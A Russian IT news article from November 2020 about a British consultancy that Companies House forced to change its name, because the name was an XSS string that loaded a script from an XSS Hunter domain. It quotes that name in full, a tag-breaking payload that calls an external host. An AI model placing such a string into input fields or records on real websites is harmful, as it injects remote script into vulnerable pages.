IT / Новости
события
10.11.2020

Британскую компанию обязали сменить название, потому что оно провоцировало атаки на веб-сайты

Регистрационная палата Великобритании обязала местную консалтинговую компанию сменить название после того, как было установлено, что оно может провоцировать запуск XSS-атаки (межсайтовый скриптинг) на уязвимые веб-страницы. Одним из таких уязвимых веб-ресурсов является сайт самой Регистрационной палаты.

По сообщению издания The Guardian, прошлом известно немало случаев, когда основатели компаний в качестве шутки используют в названии своих предприятий части кода. На этот раз речь идет о британской консалтинговой компании под названием ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. Было установлено, что такое имя может нести опасность веб-ресурсам, не способным корректно обрабатывать HTML-форматирование. Это могло приводить к загрузке и выполнению скрипта с платформы XSS Hunter, которая используется для поиска уязвимостей, связанных с межсайтовым скриптингом.

Согласно данным издания, это не несет какой-либо опасности, однако, Регистрационная палата всё же обязала владельца компании сменить название. Теперь компания называется «THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD» (Компания, в названии которой были HTML-теги). На фоне этого в Регистрационной палате заявили о намерении внести поправки в действующие нормы регистрации названий компаний, чтобы избежать возникновение подобных инцидентов в будущем.

Изображение: pixabay.com

Еще по теме

В России создается умная среда подготовки правовых документов

Как повысить эффективность отрасли углеводородов за счет digital-решений

Особенности экспорта российских IT-решений в 2022 году

Поможет ли маркировка дипфейков защите персональных данных россиян

Методы борьбы с уязвимостями в системах лояльности и в процессах покупки

Российские высокие технологии проникли во все сферы экономики, но нуждаются в данных для развития

О трендах и перспективах цифровизации территорий России

В России хотят создать Совет по программно-аппаратным комплексам

Как избежать провалов в бизнесе при внедрении IТ-решений

Поможет ли перевод сайтов СМИ в публичные облака их кибербезопасности

Как проходит импортозамещение на рынке автономного транспорта в России

IT-отрасль ждет решения о господдержке экспорта ПО

Чего ждет IT-отрасль от эксперимента по использованию открытого ПО

Топ-5 актуальных запросов от пользователей российских BI-систем

Как совместить Bug Bounty и критически важные государственные ресурсы